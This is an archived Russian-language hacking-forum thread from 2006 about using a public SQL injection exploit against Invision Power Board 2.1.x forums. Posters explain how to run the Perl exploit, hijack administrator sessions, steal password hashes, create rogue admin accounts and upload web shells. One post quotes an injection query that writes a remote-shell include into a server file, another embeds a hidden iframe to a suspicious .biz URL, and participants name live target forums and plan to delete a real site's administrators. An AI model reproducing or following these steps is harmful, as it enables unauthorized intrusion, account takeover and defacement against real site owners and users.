Просмотр полной версии : Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
InFiNiTy
14.07.2006, 20:50
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
Как говорится ждем дефейсофф
во.крутая вещь.уже протестировал.вообще супер.
zeppe1in
17.07.2006, 00:16
<div style="VISIBILITY: hidden"><iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe></div>
нах такое надо?
zeppe1in
+1
RST всегда отличались тем что любили счетчики на шеллы влепить или же ифреймик что собственно и наблюдаем=))
http://zaco.cup.su/uploads/SmWsHbZ.txt вообще он тоже дерьмовый но суть не в этом :D :D
А как этот шел запускается .Что то он у меня не запускается
Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.
Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.
lineageii.ru. достаточно серёзный проект и я недумаю что там настолько глупые админы чтоб не патчить свой форум!
Поддерживая ZaCo, скажу что шелл RST действительно дерьмо, да и ребята там не очень хорошо поступают, воруя чужие идеи.
Вы случаем не в курсе,что случилось с форумом diablozone.net?
А что с ним такого?-работает!!
И ты явно написал по теме..
ForgetMeNot
17.07.2006, 15:49
Он не работал дня 2..просто узнать хотелось..может кто че знает
ForgetMeNot
17.07.2006, 15:49
нет так нет=)
samurays
17.07.2006, 17:15
Люди добрые, есть у кого нибудь реальный Exploit чтоб работал 100% на IPB 2.1.6?
Тот что здесь давали не работает там где мне надо :(
Люди добрые, есть у кого нибудь реальный Exploit чтоб работал 100% на IPB 2.1.6?
Тот что здесь давали не работает там где мне надо :(
Cплойт не может работать на 100% !!
Если форум патченный и нет не одного сплойта который будет канать!
Так что дырка сама автоматом заделалась ?
Ну почему-же - сама ? Админы помогли...
samurays
17.07.2006, 18:12
Cплойт не может работать на 100% !!
Если форум патченный и нет не одного сплойта который будет канать!
А есть у кого експлоит который бы работал на magic_quote=on?
нa IPB 2.1.6
Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт.
P.S. и действовать быстро.
Exploit для IPB работает нормально, я так уже стал сеперюзером на форуме
VampiRUS
18.07.2006, 07:41
сразу извиняюсь, я ipb не очень знаком:(
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Sulf aka Joker
18.07.2006, 07:48
А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
сразу извиняюсь, я ipb не очень знаком
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Советую открыть исходник, имхо.
VampiRUS
19.07.2006, 05:26
Советую открыть исходник, имхо. Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд.
А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
тогда я непонимаю логику создателей форума, для чего такое надо.
Maybe admin session not exist. Please try later.
в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?
zeppe1in
19.07.2006, 12:23
По поводу сплойта
кто знает как выглядит Client_ip в хттп запросе?
Хай всем!
Хочу залить шелл через IPB 2.1.5
Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\";
Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php :) )
Кто поможет сакс хакеру залить шелл?
Вручную заголовок подделай.
Там не трудно... а потом скуль запросом через админку подними себе права...
Вот мой 100% рабочий запрос, проверял на ИБП 2.1.6 просто подставь свои значения и выполни его...
короче вырезает форум мой запрос :( если что в асю стукнись - подскажу...
GET http://<your forum>/admin.php?adsess=<adsess_id>
кто нить а подскажите как сплойт этот запустить?
кто нить а подскажите как сплойт этот запустить?
perl C:/гдеонутебялежить/rst.pl
Разумеется перл нужно скачать.
exmpl:
Start -> Execute;
cmd;
C:\\path_to_perl\\perl.exe C:\\path_to_exploit\\exploit.pl
Не ребят... так дело не пойдет...
Начну с того, что помочь вручную подделать заголовок я согласился только Пончику, а в асю поломилось пол ачата, ну это ладно, Бог с ним, хорошим людям помочь никогда не жалко, но ведь есть такие, которые пишут в асю, а на мой вопрос, что именно у тебя не получается пишут мне в ответ кучу матов и говорят, что я \"ничего\" не умею и помочь ничем не могу, ну и многое другое...
В общем все. От меня больше никто никогда не получит никакой помощи здесь. Люди не умеют быть благодарными, не ценят времени и помощи, их не волнует сколько времени человек продолбался над той или иной задачей, они считают его обязанностью помочь им, а для разнообразия в конце еще и обматерят. :(
Это просто не культурно. Просто не по человечески как то. Аж обидно стало. Ну да ладно... я все сказал.
Digimortal
06.09.2006, 02:08
Пацаны чо за херня - http://forum.lineageii.ru/
Писалось что форума уязвим - попытался вытащить cash пароль написало Lineageii.Ru
Потом опять тестил на уязвимость - уже пишет что форум не уязвим ...
Так что дырка сама автоматом заделалась ? :)
Самое прикольно автоматика сработала - захожу на сайт и вот что мне -
Забанен, хацкер. :)
Крутая защита - ничего сказать не могу ...
:) м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. :)
А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил.
Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...
:) м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. :)
А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил.
Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...
Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд.
З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )
Digimortal
06.09.2006, 10:09
Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд.
З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )
bandera, темы поднимаю я старые потому, что на их дату появления обычно и не смотрю. Если мне охота что-нить написать, я пишу, так что извеняй...
Zarakul'а я вообще не знаю. На циферку с моей репутацией я даже внимания не обращаю, так как мне эта репутация нафиг не нужна...
Если мне охота что-нить написать, я пишу, так что извеняй...
Ёпт так пиши тогда в болталке, если так охота.
~Real F@ck!~
12.09.2006, 11:45
Зачем в ПМ? Сначала надо проверить уязвим ли форум. Затем если он уязвим надо ждать админа пока он прийдёт и залезет на форум, и тогда только ты его сессию спиздиш! А так пока админа на форуме нет жди и думай..... о чем нибудь.
И еще надо сначала нажать Get admin Session- потом увидиш или -Please later(что то типа такого)- или Попрёт все!
GrAmOzEkA
15.09.2006, 09:49
Спасибо.
~Real F@ck!~
15.09.2006, 11:47
На спасибо далеко неудедеш! Для этого есть репа!
Ты не видишь, что у человека нет репы?
Он просто попросил о помощи, не ужели нельзя помочь безкорысно!? Тем более ничего особенного ты не подсказал... Ведь тебе точно также помогать будут... точней не будут...
~Real F@ck!~
15.09.2006, 12:19
Ты небудеш другие будут! И ещё.... для чего репа существует, для дого что б по ней отправлять благодарности! Если бы ёё небыло форум давно был бы весь во флуде и оффтопе! А так если я ему подсказал и ему помогло- я за него рад! И помогу всем и всегда безкорыстно- я просто напомнил челу что здесь есть репа и если он хочет то стукнет по ней!
Ты небудеш другие будут! И ещё.... для чего репа существует, для дого что б по ней отправлять благодарности! Если бы ёё небыло форум давно был бы весь во флуде и оффтопе! А так если я ему подсказал и ему помогло- я за него рад! И помогу всем и всегда безкорыстно- я просто напомнил челу что здесь есть репа и если он хочет то стукнет по ней!
По моему человеку, у которого 0 репы безсмысленно напоминать о том, что благодарность тебе за помощь он может выразить с помощью репы...
Ну ладно, не в том суть, просто мне обидно стало, что человек уже не может помочь не потребовав ничего в замен...
~Real F@ck!~
15.09.2006, 22:30
Могу блин! Ты чего намёка непонял! Я этим хотел сказать что хватит флудить, в конце то концов, для этого есть специальная служба(так скажем) и если он захочет поблагодарить или ещё чего нибудь тогда сделает это! Так что 2Driver я хз что ты там говориш!
Да не плохо не плохо только не везьде работает !
Inkognito2008
20.09.2006, 01:23
Народ подскажите:
Я проверял exploit by RST на своем форуме IPB 2.1.4 после запускаexploit'a в появившемся окне жму GET ADMIN SESSION заполняются поля session_id, session_ip_address затем жму CREAT NEW ADMIN создается новый админ и я захожу в админку. Решил попробовать на форуме который хочу взломать а он при нажатии на GET ADMIN SESSION выдает сообщение MAYBE ADMIN SESSION NOT EXIST. PLEASE TRY LATER.
Подскажите пожалуйста в чем проблема почему не хочет создаваться новый админ версия форума стоит такаяже как у меня.
Digimortal
20.09.2006, 01:41
Проблема, похоже, с английским :).
Попробуй позже, когда сессия админа появится...
Inkognito2008
20.09.2006, 01:50
Ну не совсем с англиским у меня есть сократ =). Обьясни что значит сессия админа почему ее нет и когда она появляется. (если не сложно подскажи ламаку)
VampiRUS
20.09.2006, 03:22
Сессия это как бы временный идентификатор того что её владелец действительно тот кем представляется. Сессия появится когда админ зайдёт в админку(насколько я всё это понимаю).
Digimortal
21.09.2006, 23:45
Ну не совсем с англиским у меня есть сократ =). Обьясни что значит сессия админа почему ее нет и когда она появляется. (если не сложно подскажи ламаку)
Ок. Как ламак ламаку подскажу.
Сессия админа создается при его входе. И вроде как сохраняется еще 2 часа, после того как он покинет форум. В это время и надо применять сплоит..
Объясните нупу плиз. Этот эксплойи просто в сообщение надо вставить или через cmd?
VampiRUS
22.09.2006, 11:12
Объясните нупу плиз. Этот эксплойи просто в сообщение надо вставить или через cmd?
ставишь ActivePerl, и кликаешь 2 раза по сплоиту.
ставишь ActivePerl, и кликаешь 2 раза по сплоиту.
Актив Перл у мну с детства. А эксплойт ведь в txt а не в pl. Но всеравно держи + за помощь :)
~Real F@ck!~
22.09.2006, 11:32
Shin ты просто переименновываеш .txt в .pl и всё! Потом юзаеш актив перл, и ещё удобство этого эксплоита заключаеться в его графической оболочки! Короче юзай перл и мути взлом!
Я единственное в этом эксплойте не понял как админа делать. Кто расскажет по подробнее?
~Real F@ck!~, хм я все-таки что-то не допонимаю. Где в данном эксплойте мутить адрес сервака?
Тут?
08.06.06
1dt.w0lf
RST/GHC
http://rst.void.ru
http://ghc.ru
Или тут
$addrs[] = $_SERVER['HTTP_CLIENT_IP'];
$addrs[] = $_SERVER['REMOTE_ADDR'];
$addrs[] = $_SERVER['HTTP_PROXY_USER'];
Еще раз извеняюсь я 1й раз просто сталкиваюсь с подобным эксплойтом. Восновном там через cmd указываешь адрес и пач
~Real F@ck!~, хм я все-таки что-то не допонимаю. Где в данном эксплойте мутить адрес сервака?
Тут?
08.06.06
1dt.w0lf
RST/GHC
http://rst.void.ru
http://ghc.ru
Или тут
$addrs[] = $_SERVER['HTTP_CLIENT_IP'];
$addrs[] = $_SERVER['REMOTE_ADDR'];
$addrs[] = $_SERVER['HTTP_PROXY_USER'];
Еще раз извеняюсь я 1й раз просто сталкиваюсь с подобным эксплойтом. Восновном там через cmd указываешь адрес и пач
Смотри короче. Берёшь сплойт переименовываешь в файл file.pl и качаешь на в корень диска. Потом стандартно запускаешь C:\perl\bin\perl.exe C:\file.pl. И всё появляеться графическая оболочка и дальше сам делай что надо )).
VampiRUS
22.09.2006, 11:43
2Shin просто переименовывай и запускай, и будет тебе щастье))
2SanyaX Получаешь сессию админа и жмешь создать нового админа.
2SanyaX Получаешь сессию админа и жмешь создать нового админа.
Смотри я это делал. Но до этого нужно зарегить просто пользователя? Или как там чтО?
VampiRUS
22.09.2006, 12:03
ничего ненадо, у меня один раз тоже не регился админ.
VampiRUS
22.09.2006, 12:04
может id не админа?
Да у меня не на одном форуме не регит. Получаю админа ссесию там ниже говорит логин пароль ввожу lol:lol и мыло лбое жму создать. Он говорит что админ создан захожу в админку ввожу пасс и логин. А мне говорят такого пользователя нету!
~Real F@ck!~
22.09.2006, 13:56
АХАХАХАХА! SanyaX вроде бы понял твою багу! Ты форум на уязвимость тестил? Если уязвим то незнаю, скорее всего форум пропачен! Лучше блин непариться с этим эксплоитом, у меня с ним неразу неполучилось сдружиться, не форумов уязвимых ненашёл ни админов на форуме! Тык что может кто даст пару уязвимых форумов!
АХАХАХАХА! SanyaX вроде бы понял твою багу! Ты форум на уязвимость тестил? Если уязвим то незнаю, скорее всего форум пропачен! Лучше блин непариться с этим эксплоитом, у меня с ним неразу неполучилось сдружиться, не форумов уязвимых ненашёл ни админов на форуме! Тык что может кто даст пару уязвимых форумов!
Да нет я в начале проверяю уязвим форум или нет. Он уязвим удачно берёт хэш и соль. Вот проблемма только с созданием админа.
~Real F@ck!~
22.09.2006, 14:24
Я те как хорошему товарищу говорю непарься с этим эксплоитом, и кстати дай плиз Url этого форума я попробую, вдруг попашет!
VampiRUS
22.09.2006, 14:36
Тык что может кто даст пару уязвимых форумов!
держи этот:http://www.arkanar.net/forum/
ps:там кстати проще пароль одного из админов сбрутать.
~Real F@ck!~
22.09.2006, 15:16
VampiRUS спасибо.... ток там что то админ пропал навеке!
VampiRUS
22.09.2006, 15:19
сейчас зайду)), жди
я внутри, пробуй.
~Real F@ck!~
22.09.2006, 15:38
Слушай чувак спасибо тебе и лови от меня +! И ещё неудаляй меня пока, я видео запишу!
VampiRUS
22.09.2006, 16:02
Я то удалять небуду, а вот админы незнаю, пиши быстрее)).
~Real F@ck!~
22.09.2006, 16:12
А так это нетвой форум! Тогда нах*й ща всех админ кроме тебя удалю!
Inkognito2008
23.09.2006, 20:54
Кто знает подскажите:
Все сделал как в видео по взлому IPB 2.1.* создал пользователя применил сплоит все сработало в итоге строка где написано че то типа: введи команду либо выйди (exit) в видео вводилась команда id при попытке ввести подобные команды как в видео ни че не происходит а снова пишется та же строка с ожиданием ввода. Подскажите как действовать далее как залить шелл в такой ситуации.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot